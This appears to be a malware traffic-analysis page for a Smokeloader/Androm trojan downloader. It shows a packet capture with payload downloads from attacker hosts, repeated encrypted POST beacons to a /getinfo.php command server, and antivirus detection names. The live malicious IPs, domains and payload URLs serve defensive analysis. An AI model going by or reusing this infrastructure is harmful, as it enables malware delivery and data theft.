Androm Smoke Smokeloader Trojan Downloader TEAMVIEWER Malware PCAP file download traffic analysis sample POST /getinfo.php

Download Attachments

  • 1 pcap smoke
    Date added: November 30, 2017 2:48 am Added by: admin File size: 159 KB Downloads: 20


Malwarebytes for Home | Anti-Malware Premium | Free Trial Download

 

 

2017-11-29 18:11:36.605607 IP 192.168.1.102.50722 > 185.81.113.106.80: Flags [P.], seq 4256379733:4256380219, ack 3603920812, win 256, length 486: HTTP: GET /ital2.exe HTTP/1.1
E…..@….h…f.Qqj.”.P..3U..w.P….e..GET /ital2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 185.81.113.106/ital2.exe
Connection: Keep-Alive

2017-11-29 18:11:50.362671 IP 192.168.1.102.65301 > 184.172.60.195.5938: Flags [P.], seq 227694528:227694552, ack 2689082226, win 32506, length 24
E..@.\@…*….f..<….2..W..H#rP.~……0………………….
2017-11-29 18:12:08.945063 IP 192.168.1.102.50723 > 200.7.98.161.80: Flags [P.], seq 1108336087:1108336574, ack 1144913718, win 256, length 487: HTTP: GET /myonly3d.exe HTTP/1.1
E…G.@……..f..b..#.PB…D=.6P….:..GET /myonly3d.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 200.7.98.161
Connection: Keep-Alive

2017-11-29 18:12:45.503592 IP 192.168.1.102.65301 > 184.172.60.195.5938: Flags [P.], seq 24:48, ack 25, win 32500, length 24
E..@.^@…*….f..<….2..W..H#.P.~……0………………….
2017-11-29 18:13:18.484054 IP 192.168.1.102.50730 > 162.220.223.28.5938: Flags [P.], seq 866286821:866286830, ack 2183845084, win 256, length 9
E..1O(@…g….f…..*.23.|..*..P…^….$…….
2017-11-29 18:13:18.853727 IP 192.168.1.102.50731 > 185.188.32.1.5938: Flags [P.], seq 2125942477:2125942913, ack 550455659, win 256, length 436
E….+@…E%…f.. ..+.2~.N. .IkP…/….$…3..2..4…………4….4…….0..0.0……..0…………….2..0..64…9….2……………………67….3…6….<..3131313131/……13……………….6….<..3131313131/……13……………….6..3…6..44..7.<..<..3131313131/……13………………>:..11.2…..3…….3..3…….33..31313131312……1……2..1……12…1…6..;…7…….940………………..11………………..9…;…9.7…;………..(
2017-11-29 18:13:19.349754 IP 192.168.1.102.50732 > 185.188.32.1.5938: Flags [P.], seq 3311450262:3311450611, ack 4281986318, win 256, length 349
E….0@…Ew…f.. ..,.2.`…9..P…C2…$.X.3….(:.64…..4…………4…………64…9….2……………………67….3…6……11.2…..3…….3..3…….33..31313131312……1……2..1……12…1…6..;…;………..(.!4.0.<……R..))……….v…zh..6…`x.y-R…H.9&n(…[…..s….x.P..-/k.[o.V[..’………%[C…fRs.8..:..Mf…..HOT$…….-L.bH3..@.#f .~. sk..6.N…
2017-11-29 18:13:19.671560 IP 192.168.1.102.50733 > 185.188.32.1.5938: Flags [P.], seq 3149117744:3149118096, ack 1353054046, win 256, length 352
E….5@…Eo…f.. ..-.2…0P..^P….
…$.[.3….)…0.:.2….4…………4…………64…9….2……………………67….3…6……11.2…..3…….3..3…….33..31313131312……1……2..1……12…1…6..;…;………..(.!4.0.<………))……….q.:….e.,6…n…hz…Ht..rePZ……^.4..J…,bEf…….U….f……….{..(../..*..c>…..O.9…c..).~.|..|HN.`C…cl…..c.~\
2017-11-29 18:13:19.989973 IP 192.168.1.102.50734 > 185.188.32.1.5938: Flags [P.], seq 3746683493:3746684138, ack 84270171, win 256, length 645
E….:@…DE…f.. ….2.Q.e…[P….%…$…0.27.1.0.72.9…1…7.:9..0.62….1.4..:..+(.3..7….3….3..2.2……44.2..64.2..0.:….4::87…..4…………4…………4…….0..0.0……..0…………….2..0..5…0.4.2…60.3……..64…9….2……………………64…9..<.2…67….3…6……11.2…..3…….3..3…….33..31313131312……1……2..1……12…1…6..3…6..44..7.<..<..3131313131/……13………………>:..11.2…..3…….3..3…….33..31313131312……1……2..1……12…1…6..;…77..0..4.2….0.4.2…7…….87.:………940………………..11………………..9:.:4…..9…;…9.7…9..87.:2.32..:.2……….:1.7…..;………..(
2017-11-29 18:13:20.238004 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 3689190432:3689190469, ack 1512029063, win 256, length 37
E..M(q@….F…f…../.2… Z…P….y…$
….
….H………..#…n…….
2017-11-29 18:13:20.267772 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 37:134, ack 33, win 256, length 97
E…(r@…. …f…../.2…EZ…P….g…$(………………………$.?…..=……………….#……………=…………=………
2017-11-29 18:13:20.414540 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 134:199, ack 169, win 255, length 65
E..i(t@….’…f…../.2….Z../P……..0..)…………………..=……………….J………….R8.
2017-11-29 18:13:20.566479 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 199:360, ack 169, win 255, length 161
E…(u@……..f…../.2….Z../P……..0……………………..=……………….&
…………..e.n……..u.s……..=……..7…0…4.3.1.4.8. .P……..P………’…………………..R8.
2017-11-29 18:13:20.586132 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 360:843, ack 929, win 253, length 483
E…(v@……..f…../.2….Z..’P……..0……………………..=……………….&
…………..e.n……..u.s……..=……..7…0…4.3.1.4.8. .P……..P………’…………………..R8..0……………………..=……………….&
…………..e.n……..u.s……..=……..7…0…4.3.1.4.8. .P……..P………’…………………..R8..0……………………..=……………….&
…..(……..e.n……..u.s……..=……..7…0…4.3.1.4.8. .P……..P………’…………………..R8.
2017-11-29 18:13:20.760512 IP 192.168.1.102.50737 > 52.168.20.22.443: Flags [P.], seq 3674330352:3674330524, ack 538594737, win 258, length 172
E…?.@….Z…f4….1…… .M.P…_…………..Z.>I&.|6″..].n ..L…2.M..l…=…*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….P…………..client.teamviewer.com……….
…………………………….

2017-11-29 18:13:20.780355 IP 192.168.1.102.50736 > 194.88.106.6.80: Flags [P.], seq 278013888:278014102, ack 4109617761, win 256, length 214: HTTP: POST /getinfo.php HTTP/1.0
E…1.@……..f.Xj..0.P..’….aP….9..POST /getinfo.php HTTP/1.0
Accept: */*
Host: 194.88.106.6
User-Agent: Mozilla/6.0 (Windows NT 6.1)
Connection: close
Content-Length: 378
Content-Type: multipart/form-data; boundary=——–076788870678337

2017-11-29 18:13:20.886960 IP 192.168.1.102.50736 > 194.88.106.6.80: Flags [P.], seq 214:592, ack 1, win 256, length 378: HTTP
E…1.@….Q…f.Xj..0.P..(….aP….u..———-076788870678337
Content-Disposition: form-data; name=”u”
Content-Type: multipart/form-data
Content-Transfer-Encoding: binary

…K.P Lx….L..}6.WBg….h@.OqjA……..x….5…^.5eJFm..]`_.uU..N.y.. ….;.}V.J……c. .’….HQ.U.!.].#…s%.=..B.D.8Hi…….u.g..T…..k .Y..J-._.%{………..?Ch..v.x.u…….\…..ni……>.%.u56
———-076788870678337–

2017-11-29 18:13:30.231367 IP 192.168.1.102.50737 > 52.168.20.22.443: Flags [P.], seq 172:338, ack 4779, win 258, length 166
E…@.@….]…f4….1…… .`[P…!…….F…BA.L*..{b…e!..b..p8Ec8o.},.p..b…..x…&3.l0.5…..9-..Sk.X-.*BC……….P…I..v./….z.._s……\Px…*L..h..!.L…\..B.k..|..>….7..R…….[.4……S
2017-11-29 18:13:30.421369 IP 192.168.1.102.50737 > 52.168.20.22.443: Flags [P.], seq 338:407, ack 4870, win 258, length 69
E..m@.@……..f4….1…..B .`.P…h…….@.HS…h…………. .t…..]..}….j\..qp.)..pf_.U..,..3.5&@;..
2017-11-29 18:13:33.755763 IP 192.168.1.102.50739 > 64.111.126.113.80: Flags [P.], seq 4204223377:4204223868, ack 987423020, win 256, length 491: HTTP: GET /11/cftmon.exe HTTP/1.1
E…w.@……..f@o~q.3.P..[.:..,P…….GET /11/cftmon.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: memorywedge.net
Connection: Keep-Alive

2017-11-29 18:14:22.061175 IP 192.168.1.102.50742 > 194.88.106.6.80: Flags [P.], seq 2282295907:2282296121, ack 1658032748, win 256, length 214: HTTP: POST /getinfo.php HTTP/1.0
E…1.@……..f.Xj..6.P. .cb..lP….4..POST /getinfo.php HTTP/1.0
Accept: */*
Host: 194.88.106.6
User-Agent: Mozilla/6.0 (Windows NT 6.1)
Connection: close
Content-Length: 252
Content-Type: multipart/form-data; boundary=——–827025447422263

2017-11-29 18:14:22.175999 IP 192.168.1.102.50742 > 194.88.106.6.80: Flags [P.], seq 214:466, ack 1, win 256, length 252: HTTP
E..$1.@……..f.Xj..6.P. .9b..lP…….———-827025447422263
Content-Disposition: form-data; name=”u”
Content-Type: multipart/form-data
Content-Transfer-Encoding: binary

…K.P Lx….L..}6.WBg….h@.OqjA……..x….5…^.5eJFm..]`_.uU..N.y.. ..,.E
———-827025447422263–

2017-11-29 18:14:35.751580 IP 192.168.1.102.65301 > 184.172.60.195.5938: Flags [P.], seq 72:96, ack 73, win 32488, length 24
E..@.b@…*….f..<….2..X..H#.P.~..0…0………………….
2017-11-29 18:14:53.912795 IP 192.168.1.102.50747 > 104.87.154.217.443: Flags [P.], seq 4178893904:4178894084, ack 165261226, win 256, length 180
E…..@….;…fhW…;…..P …P…$…………..Z.>….7;….|…u.x..o8..W…`…*.,.+.0./…..$.#.(.’.
. ………=.<.5./.
…X………cdn.onenote.net……….
…………………………………..#………..
2017-11-29 18:14:53.947807 IP 192.168.1.102.50747 > 104.87.154.217.443: Flags [P.], seq 180:306, ack 4579, win 256, length 126
E…..@….n…fhW…;…… …P…._……F…BA..@….g…….^…ek….”4…x\H….8….o(….[.G…Z..’…1i…………(……..@..N.o{.S…..f.N….^’.2…….
2017-11-29 18:14:53.967006 IP 192.168.1.102.50747 > 104.87.154.217.443: Flags [P.], seq 306:456, ack 4821, win 255, length 150
E…..@….U…fhW…;…… ..~P…0G…………….v>.l…..`N’.mB1.. HA..t6.&b.L….y.*”…J…..u.iE..A..2…

.N….1_..~.w{(.i……YB5]W..d.
ir…….Q.44…v\.C.w…..z..]>7#l^.”.k-
2017-11-29 18:15:12.457665 IP 192.168.1.102.50735 > 162.220.223.8.5938: Flags [P.], seq 867:891, ack 3332, win 256, length 24
E..@(z@….J…f…../.2….Z…P……..0………………….
2017-11-29 18:15:23.266174 IP 192.168.1.102.50749 > 194.88.106.6.80: Flags [P.], seq 2860280144:2860280358, ack 4242497867, win 256, length 214: HTTP: POST /getinfo.php HTTP/1.0
E…1.@……..f.Xj..=.P.|iP..aKP…….POST /getinfo.php HTTP/1.0
Accept: */*
Host: 194.88.106.6
User-Agent: Mozilla/6.0 (Windows NT 6.1)
Connection: close
Content-Length: 252
Content-Type: multipart/form-data; boundary=——–278426458030437

2017-11-29 18:15:23.368601 IP 192.168.1.102.50749 > 194.88.106.6.80: Flags [P.], seq 214:466, ack 1, win 256, length 252: HTTP
E..$1.@……..f.Xj..=.P.|j&..aKP…<6..———-278426458030437
Content-Disposition: form-data; name=”u”

 

55 engines detected this file
SHA-256 f045c39e3156d56eb6dd4c66f94aae17cdbcb333621192d2f820f7344a9678d7
File name output.112342253.txt
File size 187 KB
Last analysis 2017-11-27 07:59:56 UTC
Community score -156

Ikarus

Trojan-Downloader.Win32.Zurgop

Jiangmin

Backdoor.Androm.thp

K7AntiVirus

Trojan-Downloader ( 004f875e1 )

K7GW

Trojan-Downloader ( 004f875e1 )

Kaspersky

Backdoor.Win32.Androm.obpp

Malwarebytes

Trojan.SmokeLoader

McAfee

RDN/Generic BackDoor

McAfee-GW-Edition

RDN/Generic BackDoor

Microsoft

TrojanDownloader:Win32/Dofoil.AC

NANO-Antivirus

Trojan.Win32.Androm.etrvfo

Palo Alto Networks

generic.ml

Panda

Trj/WLT.D

Qihoo-360

Win32/Trojan.Multi.daf

Rising

Backdoor.Androm!8.113 (KTSE)

 

:

Leave a Reply